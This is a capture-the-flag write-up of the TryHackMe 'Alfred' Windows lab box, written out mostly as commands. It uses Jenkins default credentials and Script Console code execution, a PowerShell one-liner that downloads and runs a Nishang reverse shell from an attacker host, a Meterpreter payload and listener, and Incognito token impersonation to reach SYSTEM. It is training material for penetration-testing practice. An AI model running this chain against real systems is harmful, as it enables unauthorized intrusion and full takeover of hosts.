Alfred | Windows
Difficulty: Medium
Tags: Jenkins, RCE, Nishang, Meterpreter, SeImpersonatePrivilege, Incognito
Tools Used: Nmap, curl, Jenkins, Nishang, Metasploit, Incognito

“RIP Bruce Wayne.” But Alfred lived on. 🦇
This TryHackMe Windows box combined low-friction recon with a powerful post-ex chain that revolved around token impersonation. Jenkins got us in. Windows internals took us up. If you're prepping for red team or OSCP-style Windows footholds, this box is a masterclass in leveraging misconfigurations without needing zero-days.

Initial Recon: Port Scanning and Surface Mapping

Started fast:

nmap -F 10.10.176.75

Open ports:

• 80 – HTTP

• 8080 – HTTP-proxy

• 3389 – RDP

Probed port 80 with curl:

curl 10.10.176.75

Returned:

<img src="bruce.jpg"> RIP Bruce Wayne
Donations: alfred@wayneenterprises.com

Suspicious image? Maybe stego. Downloaded bruce.jpg and threw tools at it—steghide, zsteg, exiftool. Nothing stuck. Logged it as a red herring.

Jenkins Discovery on Port 8080

Navigated to

http://10.10.176.75:8080

Login page for Jenkins.

Default creds?

Username: admin  
Password: admin

Logged in. UI footer showed Jenkins 2.190.1

Quick Google search → known RCE in Script Console.

Jumped to:

Manage Jenkins > Script Console

Tested RCE:

whoami

Success. Time to weaponize.

Shell Access with Nishang

Spun up a reverse shell:

nc -lnvp 8888

Served the Nishang PowerShellTcp.ps1:

python3 -m http.server 5555

Payload in Jenkins script console:

powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker-ip>:5555/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port 8888

Shell landed as bruce

Grabbed user flag:

type C:\Users\bruce\Desktop\user.txt

Upgrading to Meterpreter for Priv-Esc

Dropped in with a better payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=9001 -f exe -o shell.exe

Listener ready:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT 9001
run

Uploaded shell.exe and executed it. Meterpreter session caught.

Understanding Windows Tokens

With Meterpreter live:

getprivs

Found: SeImpersonatePrivilege

This is the foothold that breaks the system. On Windows, access tokens control privileges. If you can impersonate a high-value token, you become that user.

Token Abuse with Incognito

Loaded the Incognito module:

load incognito
list_tokens -g

Found:

Delegation token: BUILTIN\Administrators

Boom.

impersonate_token "BUILTIN\\Administrators"
getuid

Result:

NT AUTHORITY\SYSTEM

Just like that, we’re at the top.

Migrating for Stability

Enumerated processes:

ps

Picked a SYSTEM-owned PID and migrated:

migrate <pid>
getuid

Confirmed:

NT AUTHORITY\SYSTEM

Captured root flag:

type C:\Windows\System32\config\root.txt

Game over.

Summary / Review

Foothold:

• Jenkins default creds ➤ Script Console RCE

• Nishang shell ➤ bruce access

Escalation:

• Upgraded to Meterpreter

• Found SeImpersonatePrivilege

• Used Incognito to impersonate BUILTIN\Administrators

• Migrated to SYSTEM process

• Captured root.txt

Command Recap

nmap -F 10.10.176.75  
curl 10.10.176.75  
# Jenkins default login at port 8080  
nc -lnvp 8888  
python3 -m http.server 5555  
# Jenkins console:
powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker-ip>:5555/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port 8888  
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=9001 -f exe -o shell.exe  
# In Metasploit:
use exploit/multi/handler  
set PAYLOAD windows/meterpreter/reverse_tcp  
set LHOST <ip>  
set LPORT 9001  
run  
getprivs  
load incognito  
list_tokens -g  
impersonate_token "BUILTIN\\Administrators"  
migrate <pid>  
type C:\Windows\System32\config\root.txt

Final Thoughts

Jenkins RCE, token abuse, and root in under an hour.
This was a real-world Windows escalation chain built on weak defaults and misunderstood privileges.
Another one rooted. On to the next.